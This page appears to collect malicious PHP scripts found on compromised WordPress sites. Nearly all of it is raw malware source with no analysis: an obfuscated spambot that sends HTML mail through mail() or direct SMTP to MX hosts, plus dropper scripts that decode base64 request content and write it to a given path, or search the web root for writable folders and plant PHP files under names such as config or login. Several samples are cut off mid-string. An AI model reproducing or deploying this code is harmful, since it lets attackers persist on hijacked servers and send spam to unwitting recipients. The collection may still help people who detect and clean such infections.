Wordpress attacks PHP scripts / malware
PHP Spambot
"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next( explode( '@', $v01b6e203)); } preg_match( '|
|imsU' , $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match( '|
|imsU' , $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match( '|
|imsU' , $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match( '|
|imsU' , $v8d777f38, $v6f4b5f42); $v6f4b5f42 = $v6f4b5f42[1]; $vc34487c9 = str_replace( "%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace( "%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace( "%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace( "%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace( '/^(www|ftp)\./i' , '' , @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ ini_get( 'safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_array('mail', $v619d75f8)) { if ($v10497e3f) { if (@ mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f . $v3c87b187, "-f$v9a5cb5d8" )) { echo ( chr(79) . chr(75) . md5(1234567890) . "+0\n" ); continue; } } else { if (@ mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) { echo ( chr(79) . chr(75) . md5(1234567890) . "+0\n" ); continue; } } } $v4340fd73 = "Date: " . @ date( "D, j M Y G:i:s O") . "\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/' , '$1-$2-$3' , md5(time ())) . "@$v0897acf4>\r\n" ; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73 . "\r\n" . $v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { echo ( chr(79) . chr(75) . md5(1234567890) . "+1\n"); continue; } else { echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$vb4a88417\n" ; } } function ne667da76($v957b527b) { return preg_match( "/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/" , $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685 = "=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for ($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .= '=' . str_pad(strtoupper (dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @ fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @ pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists ("stream_socket_client" )) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25" , $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @ fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if ( substr($ve98d2f00, 0, 3) != 250) return "2+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/' , '|' , $ve98d2f00); @ fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if ( substr($ve98d2f00, 0, 3) != 250) return "3+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/' , '|' , $ve98d2f00); @ fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if ( substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/' , '|' , $ve98d2f00); @ fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if ( substr($ve98d2f00, 0, 3) != 354) return "5+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/' , '|' , $ve98d2f00); @ fputs($v66b18866, $v841a2d68 . "\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if ( substr($ve98d2f00, 0, 3) != 250) return "6+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/' , '|' , $ve98d2f00); @ fputs($v66b18866, "QUIT\r\n"); @ fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while ($v341be97d = @ fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if ( substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr" )) { @ getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if ( count($v744fa43b) === 0) return ''; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return ''; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for ($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr( ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; }
[" ; error_reporting(E_ALL ); ini_set('track_errors' , 1); define ('MAX_DIRS' , 1000); if (!isset ($_REQUEST['b64cont' ])) { print "
NO B64
"; exit (0); } $file_content = base64_decode($_REQUEST[ 'b64cont']); if (empty ($file_content)) { print "
"; exit (0); } $remote_path = $_REQUEST['rp']; if (empty ($remote_path)) { print "
"; exit (0); } $res = put_cont($remote_path, $file_content); if ($res > 0) { print "
"; } else { print "
\n"; print "
put_error: $res
"; } exit (0); function put_cont($filename, $data) { $f = fopen($filename, 'w'); if (!$f) { print "
put_cont: fopen failed: $php_errormsg
\n"; return -1; } else { $res = fwrite($f, $data); if ($res) { return $res; } else if ($res === FALSE) { print "
put_cont: fwrite failed: $php_errormsg
"; return -2; } else if ($res == 0) { print "
put_cont: fwrite failed (0 bytes): $php_errormsg
"; return -3; } } return false; } function get_cont($filename) { $f = @fopen($filename, 'r'); if (!$f) { return ""; } else { $cont= fread($f, filesize($filename)); fclose($f); return $cont; } }
[\n" ; error_reporting( E_ALL); ini_set('track_errors', 1); define ('MAX_DIRS', 1000); if (!isset($_REQUEST[ 'b64cont'])) { print "
NO b64cont
"; exit (0); } $file_content = base64_decode($_REQUEST['b64cont' ]); if (empty($file_content)) { print "
EMPTY b64cont
" ; exit (0); } $names = array ( "dirs", "dir", "lib", "search", "stats", "info" , "functions" , "db", "inc", "include", "admin", "user", "system", "file", "files" , "global" , "template" , "blog" , "header" , "footer", "press" , "test" , "title" , "code", "options", "option", "general", "gallery", "themes", "article" , "login" , "ajax" , "start" , "cache" , "proxy", "menu" , "page" , "list" , "config" , "alias", "defines", "css", "javascript", "diff" , "ini", "sql" , "xml" , "error" , "dump" , "utf" , "help" , "session", "model" , "view" , "object" , "plugin" ); $host = $_SERVER[ 'HTTP_HOST']; $uri = $_SERVER[ 'REQUEST_URI']; $doc_root = fix_path($_SERVER[ 'DOCUMENT_ROOT']); $cwd = fix_path( getcwd()); print "doc: $doc_root\n"; print "cwd: $cwd\n"; print "uri: $uri\n"; $relpath = str_replace($doc_root, "", $cwd); $dirs = explode ( '/', $relpath); print "relpath: $relpath\n"; $path = $doc_root; foreach ($dirs as $dir) { $path .= "/"; $path .= $dir; $path = fix_path($path); if ( is_readable($path)) { $start_path = $path; break; } $winpath = $path . "/.."; //winhack if ( is_readable ($winpath)) { $start_path = $winpath; break; } } if (empty($start_path)) { print "
\n" ; exit(0); } else { print "START: $start_path\n"; } $w_dirs = read_all_writable_files($start_path); if (!sizeof($w_dirs)) { print "
"; exit(0); } $mypath = $w_dirs[ array_rand($w_dirs)]; shuffle($names); foreach($names as $name) { $file = $mypath. "/".$name. ".php"; if (! file_exists($file) || ! filesize($file)) { /* Try to detect root folder */ $rx = '|'.$doc_root. '\/*|'; $replace = "http://".$host. "/"; print "replace: $file - $rx - $replace\n"; $url = preg_replace($rx, $replace, $file); $res = put_cont($file, $file_content); chmod ($file, 0755); print "
\n" ; if ($res > 0) { print "
" ; } else { print "
put error: $res
"; } exit(0); } } print "
"; exit(0); function read_all_writable_files($root = '.' ){ $nn = 0; $files = array(); $directories = array(); $directories[] = $root; while (sizeof($directories)) { $dir = array_pop($directories); if (!is_readable($dir)) continue; if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if ($file == '.' || $file == '..') { continue; } $file = $dir. "/".$file; if ( is_dir($file)) { array_push($directories, $file); if ( is_writable($file)) { $files[] = fix_path(realpath($file)); if ($nn++ > 1000) { return $files; } } } } closedir($handle); } } return $files; } function put_cont($filename, $data) { $f = fopen($filename, 'w'); if (!$f) { print "
put_cont: fopen failed: $php_errormsg
\n"; return -1; } else { $res = fwrite($f, $data); if ($res) { return $res; } else if ($res === FALSE) { print "
put_cont: fwrite failed: $php_errormsg
"; return -2; } else if ($res == 0) { print "
put_cont: fwrite failed (0 bytes): $php_errormsg
"; return -3; } } return false; } function get_cont($filename) { $f = @fopen($filename, 'r'); if (!$f) { return ""; } else { $cont= fread($f, filesize($filename)); fclose($f); return $cont; } } function fix_path ($path) { $path = preg_replace( '/(\\\|\/)+/', '/', $path); return $path; }
[NO b64cont"; exit (0 ); } $file_content = base64_decode($_REQUEST['b64cont' ]); if (empty ($file_content )) { print "
EMPTY b64cont
" ; exit (0 ); } $names = array ("dirs" , "dir", "lib", "search" , "stats", "info", "functions" , "db", "inc" , "include", "admin", "user" , "system", "file", "files", "global" , "template", "blog", "header" , "footer", "press", "test" , "title", "code", "options" , "option", "general", "gallery" , "themes", "article", "login" , "ajax", "start", "cache" , "proxy", "menu", "page" , "list", "config", "alias", "defines" , "css", "javascript", "diff" , "ini", "sql", "xml" , "error", "dump", "utf" , "help", "session", "model", "view" , "object", "plugin"); $host = $_SERVER['HTTP_HOST' ]; $uri = $_SERVER['REQUEST_URI' ]; $doc_root = $_SERVER ['DOCUMENT_ROOT' ]; $w_dirs = read_all_writable_files ($doc_root ); $mypath = $w_dirs [array_rand($w_dirs)]; shuffle( $names); foreach( $names as $name) { $file = $mypath .$name .".php" ; if (!file_exists($file)) { $doc_root = preg_replace(' /( \\\| \/)+ /' , '/', $doc_root); //Normalize slashes to / $url = preg_replace(' /( \\\| \/)+ /' , '/', $file); //Normalize slashes to / /* Try to detect root folder */ $rx = '|'. $doc_root. '\/*|'; $replace = "http://".$host."/" ; $url = preg_replace($rx, $replace, $url); if (put_cont ($file , $file_content )) { print "
" ; exit(0 ); } } } print "
"; exit(); function read_all_writable_files( $root = '.' ){ $nn = 0; $files = array(); $directories = array(); $last_letter = $root[strlen ($root )-1 ]; $root = ($last_letter == '\\ ' || $last_letter == '/') ? $root : $root .DIRECTORY_SEPARATOR ; $directories[] = $root; while (sizeof ($directories )) { $dir = array_pop( $directories); if (!is_readable ($dir )) continue; if ($handle = opendir( $dir)) { while (false !== ( $file = readdir($handle))) { if ($file == '.' || $file == '..') { continue; } $file = $dir .$file ; if (is_dir($file)) { $directory_path = $file .DIRECTORY_SEPARATOR ; array_push($directories, $directory_path); if (is_writable($directory_path)) { $files [] = $directory_path ; if ($nn ++ > MAX_DIRS ) { return $files ; } } } } closedir( $handle); } } return $files ; } function put_cont( $filename, $data) { $f = @fopen ($filename , 'a+'); if (!$f) { return false; } else { $bytes = fwrite($f, $data); fclose($f); return $bytes ; } } function get_cont( $filename) { $f = @fopen ($filename , 'r'); if (!$f) { return ""; } else { $cont = fread($f, filesize( $filename)); fclose($f); return $cont ; } } ?>
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